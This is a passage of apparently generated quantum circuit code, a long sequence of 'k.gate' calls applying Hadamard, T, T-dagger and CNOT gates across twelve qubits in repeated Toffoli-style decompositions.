k.gate('cnot',[3,5])
k.gate('cnot',[4,3])
k.gate('cnot',[5,4])
k.gate('h',[3])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[3])
k.gate('t',[9])
k.gate('cnot',[3,6])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('tdag',[3])
k.gate('cnot',[6,3])
k.gate('tdag',[6])
k.gate('tdag',[3])
k.gate('t',[9])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('cnot',[3,6])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[7])
k.gate('t',[2])
k.gate('t',[11])
k.gate('t',[7])
k.gate('cnot',[11,2])
k.gate('cnot',[7,11])
k.gate('cnot',[2,7])
k.gate('tdag',[11])
k.gate('cnot',[2,11])
k.gate('tdag',[2])
k.gate('tdag',[11])
k.gate('t',[7])
k.gate('cnot',[7,11])
k.gate('cnot',[2,7])
k.gate('cnot',[11,2])
k.gate('h',[7])
k.gate('h',[11])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[11])
k.gate('cnot',[1,0])
k.gate('cnot',[11,1])
k.gate('cnot',[0,11])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[11])
k.gate('cnot',[11,1])
k.gate('cnot',[0,11])
k.gate('cnot',[1,0])
k.gate('h',[11])
k.gate('h',[7])
k.gate('t',[2])
k.gate('t',[11])
k.gate('t',[7])
k.gate('cnot',[11,2])
k.gate('cnot',[7,11])
k.gate('cnot',[2,7])
k.gate('tdag',[11])
k.gate('cnot',[2,11])
k.gate('tdag',[2])
k.gate('tdag',[11])
k.gate('t',[7])
k.gate('cnot',[7,11])
k.gate('cnot',[2,7])
k.gate('cnot',[11,2])
k.gate('h',[7])
k.gate('h',[11])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[11])
k.gate('cnot',[1,0])
k.gate('cnot',[11,1])
k.gate('cnot',[0,11])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[11])
k.gate('cnot',[11,1])
k.gate('cnot',[0,11])
k.gate('cnot',[1,0])
k.gate('h',[11])
k.gate('h',[6])
k.gate('t',[7])
k.gate('t',[11])
k.gate('t',[6])
k.gate('cnot',[11,7])
k.gate('cnot',[6,11])
k.gate('cnot',[7,6])
k.gate('tdag',[11])
k.gate('cnot',[7,11])
k.gate('tdag',[7])
k.gate('tdag',[11])
k.gate('t',[6])
k.gate('cnot',[6,11])
k.gate('cnot',[7,6])
k.gate('cnot',[11,7])
k.gate('h',[6])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[5])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,5])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('tdag',[8])
k.gate('cnot',[5,8])
k.gate('tdag',[5])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('cnot',[8,5])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[3])
k.gate('t',[4])
k.gate('t',[8])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('tdag',[4])
k.gate('cnot',[3,4])
k.gate('tdag',[3])
k.gate('tdag',[4])
k.gate('t',[8])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('cnot',[4,3])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[5])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,5])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('tdag',[8])
k.gate('cnot',[5,8])
k.gate('tdag',[5])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('cnot',[8,5])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[6])
k.gate('t',[7])
k.gate('t',[11])
k.gate('t',[6])
k.gate('cnot',[11,7])
k.gate('cnot',[6,11])
k.gate('cnot',[7,6])
k.gate('tdag',[11])
k.gate('cnot',[7,11])
k.gate('tdag',[7])
k.gate('tdag',[11])
k.gate('t',[6])
k.gate('cnot',[6,11])
k.gate('cnot',[7,6])
k.gate('cnot',[11,7])
k.gate('h',[6])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[5])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,5])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('tdag',[8])
k.gate('cnot',[5,8])
k.gate('tdag',[5])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('cnot',[8,5])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[3])
k.gate('t',[4])
k.gate('t',[8])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('tdag',[4])
k.gate('cnot',[3,4])
k.gate('tdag',[3])
k.gate('tdag',[4])
k.gate('t',[8])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('cnot',[4,3])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[5])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,5])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('tdag',[8])
k.gate('cnot',[5,8])
k.gate('tdag',[5])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('cnot',[8,5])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[7])
k.gate('t',[2])
k.gate('t',[11])
k.gate('t',[7])
k.gate('cnot',[11,2])
k.gate('cnot',[7,11])
k.gate('cnot',[2,7])
k.gate('tdag',[11])
k.gate('cnot',[2,11])
k.gate('tdag',[2])
k.gate('tdag',[11])
k.gate('t',[7])
k.gate('cnot',[7,11])
k.gate('cnot',[2,7])
k.gate('cnot',[11,2])
k.gate('h',[7])
k.gate('h',[11])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[11])
k.gate('cnot',[1,0])
k.gate('cnot',[11,1])
k.gate('cnot',[0,11])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[11])
k.gate('cnot',[11,1])
k.gate('cnot',[0,11])
k.gate('cnot',[1,0])
k.gate('h',[11])
k.gate('h',[7])
k.gate('t',[2])
k.gate('t',[11])
k.gate('t',[7])
k.gate('cnot',[11,2])
k.gate('cnot',[7,11])
k.gate('cnot',[2,7])
k.gate('tdag',[11])
k.gate('cnot',[2,11])
k.gate('tdag',[2])
k.gate('tdag',[11])
k.gate('t',[7])
k.gate('cnot',[7,11])
k.gate('cnot',[2,7])
k.gate('cnot',[11,2])
k.gate('h',[7])
k.gate('h',[11])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[11])
k.gate('cnot',[1,0])
k.gate('cnot',[11,1])
k.gate('cnot',[0,11])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[11])
k.gate('cnot',[11,1])
k.gate('cnot',[0,11])
k.gate('cnot',[1,0])
k.gate('h',[11])
k.gate('h',[6])
k.gate('t',[7])
k.gate('t',[11])
k.gate('t',[6])
k.gate('cnot',[11,7])
k.gate('cnot',[6,11])
k.gate('cnot',[7,6])
k.gate('tdag',[11])
k.gate('cnot',[7,11])
k.gate('tdag',[7])
k.gate('tdag',[11])
k.gate('t',[6])
k.gate('cnot',[6,11])
k.gate('cnot',[7,6])
k.gate('cnot',[11,7])
k.gate('h',[6])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[5])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,5])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('tdag',[8])
k.gate('cnot',[5,8])
k.gate('tdag',[5])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('cnot',[8,5])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[3])
k.gate('t',[4])
k.gate('t',[8])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('tdag',[4])
k.gate('cnot',[3,4])
k.gate('tdag',[3])
k.gate('tdag',[4])
k.gate('t',[8])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('cnot',[4,3])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[5])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,5])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('tdag',[8])
k.gate('cnot',[5,8])
k.gate('tdag',[5])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('cnot',[8,5])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[6])
k.gate('t',[7])
k.gate('t',[11])
k.gate('t',[6])
k.gate('cnot',[11,7])
k.gate('cnot',[6,11])
k.gate('cnot',[7,6])
k.gate('tdag',[11])
k.gate('cnot',[7,11])
k.gate('tdag',[7])
k.gate('tdag',[11])
k.gate('t',[6])
k.gate('cnot',[6,11])
k.gate('cnot',[7,6])
k.gate('cnot',[11,7])
k.gate('h',[6])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[5])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,5])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('tdag',[8])
k.gate('cnot',[5,8])
k.gate('tdag',[5])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('cnot',[8,5])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[3])
k.gate('t',[4])
k.gate('t',[8])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('tdag',[4])
k.gate('cnot',[3,4])
k.gate('tdag',[3])
k.gate('tdag',[4])
k.gate('t',[8])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('cnot',[4,3])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[5])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,5])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('tdag',[8])
k.gate('cnot',[5,8])
k.gate('tdag',[5])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('cnot',[8,5])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[5])
k.gate('t',[10])
k.gate('t',[11])
k.gate('t',[5])
k.gate('cnot',[11,10])
k.gate('cnot',[5,11])
k.gate('cnot',[10,5])
k.gate('tdag',[11])
k.gate('cnot',[10,11])
k.gate('tdag',[10])
k.gate('tdag',[11])
k.gate('t',[5])
k.gate('cnot',[5,11])
k.gate('cnot',[10,5])
k.gate('cnot',[11,10])
k.gate('h',[5])
k.gate('h',[11])
k.gate('t',[4])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,4])
k.gate('cnot',[11,9])
k.gate('cnot',[4,11])
k.gate('tdag',[9])
k.gate('cnot',[4,9])
k.gate('tdag',[4])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[4,11])
k.gate('cnot',[9,4])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[3])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,3])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('tdag',[8])
k.gate('cnot',[3,8])
k.gate('tdag',[3])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('cnot',[8,3])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[2])
k.gate('t',[7])
k.gate('t',[8])
k.gate('cnot',[7,2])
k.gate('cnot',[8,7])
k.gate('cnot',[2,8])
k.gate('tdag',[7])
k.gate('cnot',[2,7])
k.gate('tdag',[2])
k.gate('tdag',[7])
k.gate('t',[8])
k.gate('cnot',[8,7])
k.gate('cnot',[2,8])
k.gate('cnot',[7,2])
k.gate('h',[8])
k.gate('h',[7])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[7])
k.gate('cnot',[1,0])
k.gate('cnot',[7,1])
k.gate('cnot',[0,7])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[7])
k.gate('cnot',[7,1])
k.gate('cnot',[0,7])
k.gate('cnot',[1,0])
k.gate('h',[7])
k.gate('h',[8])
k.gate('t',[2])
k.gate('t',[7])
k.gate('t',[8])
k.gate('cnot',[7,2])
k.gate('cnot',[8,7])
k.gate('cnot',[2,8])
k.gate('tdag',[7])
k.gate('cnot',[2,7])
k.gate('tdag',[2])
k.gate('tdag',[7])
k.gate('t',[8])
k.gate('cnot',[8,7])
k.gate('cnot',[2,8])
k.gate('cnot',[7,2])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[3])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,3])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('tdag',[8])
k.gate('cnot',[3,8])
k.gate('tdag',[3])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('cnot',[8,3])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[4])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,4])
k.gate('cnot',[11,9])
k.gate('cnot',[4,11])
k.gate('tdag',[9])
k.gate('cnot',[4,9])
k.gate('tdag',[4])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[4,11])
k.gate('cnot',[9,4])
k.gate('h',[11])
k.gate('h',[5])
k.gate('t',[10])
k.gate('t',[11])
k.gate('t',[5])
k.gate('cnot',[11,10])
k.gate('cnot',[5,11])
k.gate('cnot',[10,5])
k.gate('tdag',[11])
k.gate('cnot',[10,11])
k.gate('tdag',[10])
k.gate('tdag',[11])
k.gate('t',[5])
k.gate('cnot',[5,11])
k.gate('cnot',[10,5])
k.gate('cnot',[11,10])
k.gate('h',[5])
k.gate('h',[11])
k.gate('t',[4])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,4])
k.gate('cnot',[11,9])
k.gate('cnot',[4,11])
k.gate('tdag',[9])
k.gate('cnot',[4,9])
k.gate('tdag',[4])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[4,11])
k.gate('cnot',[9,4])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[3])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,3])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('tdag',[8])
k.gate('cnot',[3,8])
k.gate('tdag',[3])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('cnot',[8,3])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[2])
k.gate('t',[7])
k.gate('t',[8])
k.gate('cnot',[7,2])
k.gate('cnot',[8,7])
k.gate('cnot',[2,8])
k.gate('tdag',[7])
k.gate('cnot',[2,7])
k.gate('tdag',[2])
k.gate('tdag',[7])
k.gate('t',[8])
k.gate('cnot',[8,7])
k.gate('cnot',[2,8])
k.gate('cnot',[7,2])
k.gate('h',[8])
k.gate('h',[7])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[7])
k.gate('cnot',[1,0])
k.gate('cnot',[7,1])
k.gate('cnot',[0,7])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[7])
k.gate('cnot',[7,1])
k.gate('cnot',[0,7])
k.gate('cnot',[1,0])
k.gate('h',[7])
k.gate('h',[8])
k.gate('t',[2])
k.gate('t',[7])
k.gate('t',[8])
k.gate('cnot',[7,2])
k.gate('cnot',[8,7])
k.gate('cnot',[2,8])
k.gate('tdag',[7])
k.gate('cnot',[2,7])
k.gate('tdag',[2])
k.gate('tdag',[7])
k.gate('t',[8])
k.gate('cnot',[8,7])
k.gate('cnot',[2,8])
k.gate('cnot',[7,2])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[3])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,3])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('tdag',[8])
k.gate('cnot',[3,8])
k.gate('tdag',[3])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('cnot',[8,3])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[4])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,4])
k.gate('cnot',[11,9])
k.gate('cnot',[4,11])
k.gate('tdag',[9])
k.gate('cnot',[4,9])
k.gate('tdag',[4])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[4,11])
k.gate('cnot',[9,4])
k.gate('h',[11])
k.gate('h',[4])
k.gate('t',[10])
k.gate('t',[11])
k.gate('t',[4])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('tdag',[11])
k.gate('cnot',[10,11])
k.gate('tdag',[10])
k.gate('tdag',[11])
k.gate('t',[4])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('h',[4])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,3])
k.gate('cnot',[11,9])
k.gate('cnot',[3,11])
k.gate('tdag',[9])
k.gate('cnot',[3,9])
k.gate('tdag',[3])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[3,11])
k.gate('cnot',[9,3])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[2])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,2])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('tdag',[8])
k.gate('cnot',[2,8])
k.gate('tdag',[2])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('cnot',[8,2])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[8])
k.gate('cnot',[1,0])
k.gate('cnot',[8,1])
k.gate('cnot',[0,8])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[8])
k.gate('cnot',[8,1])
k.gate('cnot',[0,8])
k.gate('cnot',[1,0])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[2])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,2])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('tdag',[8])
k.gate('cnot',[2,8])
k.gate('tdag',[2])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('cnot',[8,2])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,3])
k.gate('cnot',[11,9])
k.gate('cnot',[3,11])
k.gate('tdag',[9])
k.gate('cnot',[3,9])
k.gate('tdag',[3])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[3,11])
k.gate('cnot',[9,3])
k.gate('h',[11])
k.gate('h',[4])
k.gate('t',[10])
k.gate('t',[11])
k.gate('t',[4])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('tdag',[11])
k.gate('cnot',[10,11])
k.gate('tdag',[10])
k.gate('tdag',[11])
k.gate('t',[4])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('h',[4])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,3])
k.gate('cnot',[11,9])
k.gate('cnot',[3,11])
k.gate('tdag',[9])
k.gate('cnot',[3,9])
k.gate('tdag',[3])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[3,11])
k.gate('cnot',[9,3])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[2])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,2])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('tdag',[8])
k.gate('cnot',[2,8])
k.gate('tdag',[2])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('cnot',[8,2])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[8])
k.gate('cnot',[1,0])
k.gate('cnot',[8,1])
k.gate('cnot',[0,8])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[8])
k.gate('cnot',[8,1])
k.gate('cnot',[0,8])
k.gate('cnot',[1,0])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[2])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,2])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('tdag',[8])
k.gate('cnot',[2,8])
k.gate('tdag',[2])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('cnot',[8,2])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,3])
k.gate('cnot',[11,9])
k.gate('cnot',[3,11])
k.gate('tdag',[9])
k.gate('cnot',[3,9])
k.gate('tdag',[3])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[3,11])
k.gate('cnot',[9,3])
k.gate('h',[11])
k.gate('h',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('t',[3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('tdag',[11])
k.gate('cnot',[10,11])
k.gate('tdag',[10])
k.gate('tdag',[11])
k.gate('t',[3])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('h',[3])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,2])
k.gate('cnot',[11,9])
k.gate('cnot',[2,11])
k.gate('tdag',[9])
k.gate('cnot',[2,9])
k.gate('tdag',[2])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[2,11])
k.gate('cnot',[9,2])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[9])
k.gate('cnot',[1,0])
k.gate('cnot',[9,1])
k.gate('cnot',[0,9])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[9])
k.gate('cnot',[9,1])
k.gate('cnot',[0,9])
k.gate('cnot',[1,0])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,2])
k.gate('cnot',[11,9])
k.gate('cnot',[2,11])
k.gate('tdag',[9])
k.gate('cnot',[2,9])
k.gate('tdag',[2])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[2,11])
k.gate('cnot',[9,2])
k.gate('h',[11])
k.gate('h',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('t',[3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('tdag',[11])
k.gate('cnot',[10,11])
k.gate('tdag',[10])
k.gate('tdag',[11])
k.gate('t',[3])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('h',[3])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,2])
k.gate('cnot',[11,9])
k.gate('cnot',[2,11])
k.gate('tdag',[9])
k.gate('cnot',[2,9])
k.gate('tdag',[2])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[2,11])
k.gate('cnot',[9,2])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[9])
k.gate('cnot',[1,0])
k.gate('cnot',[9,1])
k.gate('cnot',[0,9])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[9])
k.gate('cnot',[9,1])
k.gate('cnot',[0,9])
k.gate('cnot',[1,0])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,2])
k.gate('cnot',[11,9])
k.gate('cnot',[2,11])
k.gate('tdag',[9])
k.gate('cnot',[2,9])
k.gate('tdag',[2])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[2,11])
k.gate('cnot',[9,2])
k.gate('h',[11])
k.gate('h',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('t',[2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('tdag',[11])
k.gate('cnot',[10,11])
k.gate('tdag',[10])
k.gate('tdag',[11])
k.gate('t',[2])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('h',[2])
k.gate('h',[11])
k.gate('t',[0])
k.gate('t',[1])
